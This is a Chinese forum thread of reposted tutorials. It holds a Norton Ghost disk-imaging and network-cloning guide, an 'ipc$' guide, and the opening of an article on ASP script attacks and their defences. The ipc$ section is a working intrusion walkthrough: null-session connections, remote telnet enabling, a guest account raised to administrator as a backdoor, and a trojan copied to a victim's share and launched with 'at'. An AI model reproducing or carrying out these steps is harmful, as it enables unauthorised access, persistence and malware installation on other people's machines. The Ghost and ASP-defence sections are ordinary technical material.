  如果硬盘中备份的分区数据受到损坏,用一般数据修复方法不能修复,以及系统被破坏后不能启动,都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然,也可以将备份还原到另一个硬盘上。
  要恢复备份的分区,就在界面中选择菜单Local→Partition→From Image,在弹出窗口中选择还原的备份文件,再选择还原的硬盘和分区,点击 Yes 按钮即可。


四、局域网操作

LPT 是通过并口传送备份文件,下面有两个选项:slave 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 slave 和 master 两个选项, 作用与 LPT 相同。
先和平时一样将要 ghost 的分区做成一个 *.gho 文件,再在一台 win98 上安装Symantec ghost 企业版,重启。
1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec ghost > ghost Boot Wizard->Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。(但 6.5版的生成的软盘经常有问题,不能成功启动)如果你的网卡不在列表内,你要建立专用的 Packet Driver。ADD->Packet Driver (网卡的驱动程序中有)往下根据提示一步一步走,填入工作站的 ip(ghost 一定要 tcp/ip 协议)。最后生成一张软盘,但此软盘仍不能使用,要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址,如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:
IP = 192.168.100.44
NETMASK = 255.255.255.0
GATEWAY = 192.168.100.1
2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name(别名)如:bb,再选择 image file 就是你的 gho 文件。然后 ->Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50(如果你要同时复制50台)->accept client 就算完成了,当你的工作站数达到50台时,server就自动传送*.gho 文件。

3.详述:
目前,相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下,当硬盘的软件系统出现问题时,能否实现网络硬盘克隆呢?PXE(Preboot Execution Environment,它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议)技术提供的从网络启动的功能,让我们找到了解决之道。下面,我们就来讲解怎样采用ghost 7.0来实现基于 PXE 的网络硬盘克隆。

  网络硬盘克隆过程简述

  网络硬盘克隆过程为:在装有软驱的工作站上,用一张引导盘来启动机器,连接到服务器,使用 ghost 多播服务(Multicast Server)将硬盘或分区的映像克隆到工作站,这样就实现了不拆机、安全、快速的网络硬盘克隆。

  实现 PXE 网络启动方式

  对于没有软驱、光驱的工作站,要实现PXE网络启动方式,需要完成三个步骤:

  1、工作站的PXE启动设置

  PXE网络启动一般要求在网卡上加装 PXE 启动芯片(PXE Boot ROM);对于某些型号的网卡,也可以将 PXE 启动代码(Boot Code)写入主板的 Flash ROM;而一些主板上集成了网卡的品牌机(例如清华同方的商用机),可直接支持PXE启动。

  常用的 RTL8139 芯片的网卡,其 PXE 启动设置方式是:机器启动时根据屏幕提示按下Shift+F10,在启动类型中选择PXE,开启网络启动选项即可。


B21层 发表时间: 10-07-16 18:37

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
GHOST详细解说(2)


2、制作 PXE 启动文件

  制作 PXE 的启动文件,推荐使用 3Com 的 DABS(Dynamic Access Boot Services)。DABS 提供了功能强大的 PXE 启动服务、管理功能,但是,网上可供下载的是一个30天的试用版。所以,我们只用它的启动映像文件制作功能,而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

  DABS 可以安装在任何一台运行 Windows 的机器上。安装后,运行 3Com Boot Image Editor,出现主界面图。选择“创建TCP/IP或PXE映像文件(Create a TCP/IP or PXE image file)”,出现对话窗口。为即将建立的映像文件命名,例如:pxeghost.img,其他采用默认选项,将经测试正常的网络启动盘放入软驱,选择[OK],创建PXE启动映像 Pxeghost.img文件。

  在 3Com Boot Image Editor 的主菜单中,选择“创建PXE菜单启动文件(Creat a PXE menu boot file)”,在出现的窗口中选择[添加(Add)],加入我们刚刚创建的启动映像文件Pxeghost.img,在“选项(Options)”标签中可以设置菜单标题和等待时间。

  选择[保存(Save)],给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

  3、服务器的PXE启动服务设置

  Windows 2000 Server 的 DHCP 服务支持两种启动协议:DHCP 和 BOOTP。我们可以设定以下三种选择:仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配,那么这里选“仅BOOTP”即可;如果需要这台服务器提供动态 IP 地址分配,则需要选“两者”。

  接下来,设置启动文件名。在DHCP服务器的作用域选项中配置选项“067:启动文件名”,字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意:文件名不包含路径。

  DHCP 服务器只是将启动文件名通知给 BOOTP 客户机,客户机通过什么方式下载启动文件呢?答案是,需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件,当然,也可以下载一个免费的 TFTP 服务器软件长期使用。

  在 TFTP 服务器的设置中,规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

  用 ghost 多播克隆硬盘

  现在运行 ghost 多播服务器,任务名称为 Restore。设置完毕,按下[接受客户(Accept Clients)]按钮。启动要接受硬盘克隆的无软驱工作站,如果以上步骤操作无误,应该能够实现 PXE 启动,加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后,按下[发送(Send)]按钮,开始克隆任务。
五、参数设置
在 Options 中可以设置参数。下面简单介绍一下:
1.image write buffering:在建立备份文件时, 打开写缓冲;
2.sure:选择此项后, 不再会出现最终确认询问 (建议不要选择此项);
3.no int 13:选择此项后, 不支持中断 13 (缺省时不选择);
4.reboot:在对硬盘或者分区操作完成之后, 自动重启计算机;
5.spanning:通过多个卷架构备份文件 (选择此项时, 关闭 write buffering);
6.autoname:自动为 spanning 文件命名;
7.allow 64k fat clusters:允许使用 64K FAT 簇 (仅在 Windows NT 中支持);
8.ignore CRC errors:忽略 CRC 错误;
9.override size limit:如果出现分区大小不相配, 可忽略执行;
10.image read buffering:打开生成备份文件时的读缓存 (缺省时选中此项)。


六、软件特性

1.存贮介质
  ghost 支持的存储介质超出了我们的想象,它支持对等 LPT 接口、对等 USB 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备(JAZ、ZIP、MO等)、光盘刻录机(CDR、CDRW)等。而这些特性不需要任何外带的驱动程序和软件,只需一张软盘就可以做到!特别是对光盘刻录机的支持,如今的刻录机和空白光盘都十分便宜,非常适合作备份的用途。


GHOST详细解说(3)


2.兼容性
  ghost 对现有的操作系统都有良好的支持,包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是,ghost 2001 加入了对 Linux EX2的支持(FIFO 文件存储格式),这也就意味着 Linux 的用户也可以用 ghost 来备份系统了。

3.配套软件

  A.ghost 浏览器
在以前的 ghost版本中,我们只能对整个系统进行简单的备份、复制、还原,要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在,Symantec 公司已经将 ghost 浏览器整合在软件中。ghost 浏览器采用类似于资源管理器的界面,通过它,我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。
使用Explorer可以备份整个硬盘或单个硬盘分区,点击工具栏上的圆柱形图标,弹出硬盘或分区选择对话窗口,然后再选择备份文件的储存目录并输入名称即可完成。要注意的是,非注册用户不能使用备份这项功能。
在 ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件(File/Open),这时备份中的文件就像资源管理器一样在程序界面窗口中列出,可以在其中非常方便地查看、打开文件,也可以查找文件,或者将某个文件删除(但不能删除目录)。
在 ghost Explorer 中提供了多种还原硬盘备份文件的方法,最方便的方法是使用鼠标右键点击某个文件,在弹出菜单中选择 Restore,然后输入要还原到的目录,这样,单个文件就从整个磁盘备份中还原出来了。当然,如果要还原整个磁盘备份,只需选择左面目录列表栏中最上面的带磁盘图标的目录项,然后点击工具栏中的还原图标 (第二个) 就可以了。

B.GDisk
GDisk 是一个新加入的实用工具,它彻底取代了 FDisk 和 format,功能有:
* 快速格式化。
* ######和显示分区。此功能允许一个以上的主 DOS分区,并且每个分区上的操作系统有不同的版本。######分区的能力使计算机习惯于引导到选定的可引导分区,忽略其他######分区中相同操作系统的安装。
* 全面的分区报告。
* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。
与使用交互式菜单的 FDisk 不同,GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk操作的能力。但与此同时,几十个参数会令普通用户头疼,因此笔者不推荐一般用户使用,Symantec 公司也应该推出相应的GUI(图形用户界面)控制台以方便用户使用。具体的参数说明可以用命令行 gdisk/? 了解。

C.Live Update
Live Update 是 Symantec公司软件的一个通用升级程序,它能够检查当前系统中已安装的 Symantec 软件,并且通过英特网对软件进行在线升级。
在安装 ghost 2001 时,安装程序自动升级了 Live Update 程序的版本。


七、命令行参数:(ghost 的无人 备份/恢复/复制 操作)

  其实 ghost 2001 的功能远远不止它主程序中显示的那些,ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂,不过我们可以制作批处理文件,从而“一劳永逸”(类似于无人安装 Windows 98 和Windows 2000)。现在让我们来了解一些常用的参数(了解更加详细的参数介绍可查看 ghost 的帮助文件)。
1.-rb
本次 ghost 操作结束退出时自动重启。这样,在复制系统时就可以放心离开了。
2.-fx
本次 ghost 操作结束退出时自动回到DOS提示符。
3.-sure
对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性,只建议高级用户使用。
4.-fro
如果源分区发现坏簇,则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。
5.@filename
在 filename 中指定 txt 文件。txt文件中为 ghost 的附加参数,这样做可以不受DOS命令行 150 个字符的限制。
6.-f32
将源 FAT16 分区拷贝后转换成 FAT32(前提是目标分区不小于 2G)。WinNT 4 和Windows95、97用户慎用。
7.-bootcd
当直接向光盘中备份文件时,此选项可以使光盘变成可引导。此过程需要放入启动盘。
8.-fatlimit
将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区,且不想使用64k/簇的 FAT16 时非常有用。
9.-span
分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。
10.-auto
分卷拷贝时不提示就自动赋予一个文件名继续执行。
11.-crcignore
忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据,否则不要使用此参数,以防数据错误。
12.-ia
全部映像。ghost 会对硬盘上所有的分区逐个进行备份。
13.-ial
全部映像,类似于 -ia 参数,对 Linux 分区逐个进行备份。
14.-id
全部映像。类似于 -ia 参数,但包含分区的引导信息。
15.-quiet
操作过程中禁止状态更新和用户干预。
16.-script
可以执行多个 ghost 命令行。命令行存放在指定的文件中。
17.-split=x
  将备份包划分成多个分卷,每个分卷的大小为 x兆。这个功能非常实用,用于大型备份包复制到移动式存储设备上,例如将一个 1.9G 的备份包复制到 3 张刻录盘上。
18.-z
  将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率(快速);-z2 为高压缩率(中速);-z3 至 -z9 压缩率依次增大(速度依次减慢)。
19.-clone
  这是实现 ghost 无人备份/恢复的核心参数。使用语法为:
-clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)...]
此参数行较为复杂,且各参数之间不能含有空格。其中 operation意为操作类型,值可取:copy:磁盘到磁盘;load:文件到磁盘;dump:磁盘到文件;pcopy:分区到分区;pload:文件到分区;pdump:分区到文件。
  Source 意为操作源,值可取:驱动器号,从1开始;或者为文件名,需要写绝对路径。
Destination 意为目标位置,值可取:驱动器号,从 1开始;或者为文件名,需要写绝对路径;@CDx,刻录机,x 表示刻录机的驱动器号,从1开始。

下面举例说明:

1.命令行参数:ghostpe.exe -clone,mode=copy,src=1,dst=2
完成操作:将本地磁盘1复制到本地磁盘2。

2.命令行参数:ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1
完成操作:将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数:ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M
完成操作:从映像文件装载磁盘1,并将第一个分区的大小调整为450MB,第二个调整为1599MB,第三个调整为2047MB。

4.命令行参数:ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho
完成操作:创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例
ghost.exe -clone,mode=copy,src=1,dst=2 -sure
硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure
将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho
将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2
从内部存有两个分区的映像文件中,把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb
用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息,直接启动

ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P
将映像文件还原到第二个硬盘,并将分区大小比例修改成 60:40

自动还原磁盘:
首先做一个启动盘,包含 Config.sys, Autoexec.bat, Command.com, Io.sys, ghost.exe 文件(可以用 windows 做启动盘的程序完成)。Autoexec.bat 包含以下命令:
ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb
利用在 D 盘的文件自动还原,结束以后自动退出 ghost 并且重新启动。

自动备份磁盘:
ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb

自动还原光盘:
包含文件:Config.sys, Autoexec.bat, Mscdex.exe (CDROM 执行程序), Oakcdrom.sys (ATAPI CDROM 兼容驱动程序), ghost.exe。
Config.sys 内容为:
DEVICE=OAKCDROM.SYS /D:IDECD001
Autoexec.bat 内容为:
MSCDEX.EXE /D:IDECE001 /L:Z
ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例:

1.-clone

-clone 在使用时必须加入参数,它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数:

mode={copy|load|dump|pcopy|pload|pdump},
src={drive|file|driveartition},
dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令
copy 硬盘到硬盘的复制 (disk to disk copy)
load 文件还原到硬盘 (file to disk load)
dump 将硬盘做成映像文件 (disk to file dump)
pcopy 分区到分区的复制 (partition to partition copy)
pload 文件还原到分区 (file to partition load)
pdump 分区备份成映像文件(partition to file dump)

src 指定了 ghost 运行时使用的源分区的位置模式及其意义。对应 mode 命令 src 所使用参数例子:
COPY/DUMP 源硬盘号。以 1 代表第一号硬盘
LOAD 映像文件名。g:/back98/setup98.gho 或装置名称 (drive)
PCOPY/PDUMP 源分区号。1:2 代表的是硬盘1的第二个分区
PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。g:\back98.gho:2 代表映像文件里的第二个分区

dst 指定运行 ghost 时使用的目标位置模式及其意义。对应 mode 命令 dst 所使用参数例子:
COPY/DUMP 目的硬盘号。2 代表第二号硬盘
LOAD 硬盘映像文件名。例 g:\back98\setup98.gho
PCOPY/PLOAD 目的分区号。2:2 代表硬盘 2 的第二个分区
PDUMP 分区映像文件名加分区号。g:\back98\setup98.gho:2
SZEn 指定所使用目的分区的大小:
n=xxxxM 指定第 n 目的分区的大小为 xxxxMB。如 SZE2=800M 表示分区 2 的大小为 800MB
n=mmP 指定第 n 目的分区的大小为整个硬盘的 mm 个百分比。

2.-fxo 当源物件出现坏块时,强迫复制继续进行

3.-fx 当ghost完成新系统的工作后不显示 press ctrl-alt-del to reboot 直接回到DOS下

4.-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源,复制一个分区时,ghost将首先检查来源分区,再决定是要复制文件和目录结构还是要做映像复制(扇区到扇区)。预设是这种形式。但是有的时候,硬盘里特定的位置可能会放一些######的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制

5.-pwd and -pwd=x 给映像文件加密

6.-rb 在还原或复制完成以后,让系统重新启动

7.-sure 可以和 clone 合用。ghost 不会显示 proceed with disk clone-destination drive will be overwritten? 提示信息

九、注意事项

1.在备份系统时,单个的备份文件最好不要超过 2GB。
2.在备份系统前,最好将一些无用的文件删除以减少ghost文件的体积。通常无用的文件有:Windows 的临时文件夹、IE 临时文件夹、Windows 的内存交换文件。这些文件通常要占去100 多兆硬盘空间。
3.在备份系统前,整理目标盘和源盘,以加快备份速度。
4.在备份系统前及恢复系统前,最好检查一下目标盘和源盘,纠正磁盘错误。
5.在恢复系统时,最好先检查一下要恢复的目标盘是否有重要的文件还未转移,千万不要等硬盘信息被覆盖后才后悔莫及啊。
6.在选择压缩率时,建议不要选择最高压缩率,因为最高压缩率非常耗时,而压缩率又没有明显的提高。
7.在新安装了软件和硬件后,最好重新制作映像文件,否则很可能在恢复后出现一些莫名其妙的错误。



















ipc$详细解说大全(1)



七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因:


1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;


2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;


3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);


4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);


5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;


6 对方禁止了NBT(即未打开139端口);


7 对方防火墙屏蔽了139和445端口;


8 你的用户名或者密码错误(显然空会话排除这种错误);


9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;


10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。


另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。







八 复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?


1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。


2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;

2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。


呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。


九 如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。


十 一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;

2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成。


十一 入侵中可能会用到的相关命令


请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:
net use \\IP\ipc$ "" /user:""

2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"

3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP

4 查看本地主机的共享资源(可以看到本地的默认共享)
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径


14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del















ipc$详细解说大全(2)


十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空


2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe

Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。


4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了


5 C:\>net user guest /active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no


6 C:\>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7 C:\>net localgroup administrators guest /add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。


8 好了,现在我们来走另一条路,给它传个木马玩玩


9 首先,我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator


10 既然要上传东西,就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。


11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现


12 运行木马前,我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成


13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1












B22层 发表时间: 10-07-16 18:38

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
常见ASP脚本攻击及防范技巧

由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是, 由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可乘之机。事实上,安全不仅是网管的事,编程人员也必须在某些安全细节上注意,养成良好的安全习惯,否则会给自己的网站带来巨大的安全隐患。目前,大多数网站上的ASP程序有这样那样的安全漏洞,但如果编写程序的时候注意一点的话,还是可以避免的。

  1、用户名与口令被破解

  攻击原理:用户名与口令,往往是黑客们
最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。

  防范技巧:涉及用户名与口令的程序最好封装在服务器端,尽量少在ASP文件里出现,涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接,在理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户修改、插入、删除记录的权限。

  2、验证被绕过

  攻击原理:现在需要经过验证的ASP程序大多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入。

  防范技巧:需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
3、inc文件泄露问题

  攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。

  防范技巧:程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密,其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称,尽量使用无规则的英文字母。

  4、自动备份被下载

  攻击原理:在有些编辑ASP程序的工具中,当创建或者修改一个ASP文件时,编辑器自动创建一个备份文件,比如:UltraEdit就会备份一个.bak文件,如你创建或者修改了some.asp,编辑器会自动生成一个叫some.asp.bak文件,如果你没有删除这个bak文件,攻击者可以直接下载some.asp.bak文件,这样some.asp的源程序就会被下载。

  防范技巧:上传程序之前要仔细检查,删除不必要的文档。对以BAK为后缀的文件要特别小心。

  5、特殊字符

  攻击原理:输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏;如果该输入框涉及数据查询,他们会利用特殊查询语句,得到更多的数据库数据,甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过。

  防范技巧:在处理类似留言板、BBS等输入框的ASP程序中,最好屏蔽掉HTML、javascript、VBscript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查6、数据库下载漏洞

  攻击原理:在用Access做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称,那么他也能够下载这个Access数据库文件,这是非常危险的。

  防范技巧:

  (1)为你的数据库文件名称起个复杂的非常规的名字,并把它放在几层目录下。所谓 “非常规”, 打个比方说,比如有个数据库要保存的是有关书籍的信息, 可不要给它起个“book.mdb”的名字,而要起个怪怪的名称,比如d34ksfslf.mdb, 并把它放在如./kdslf/i44/studi/的几层目录下,这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。

  (2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:

  DBPath = Server.MapPath(“cmddb.mdb”)

  conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” & DBPath

  假如万一给人拿到了源程序,你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源,再在程序中这样写:

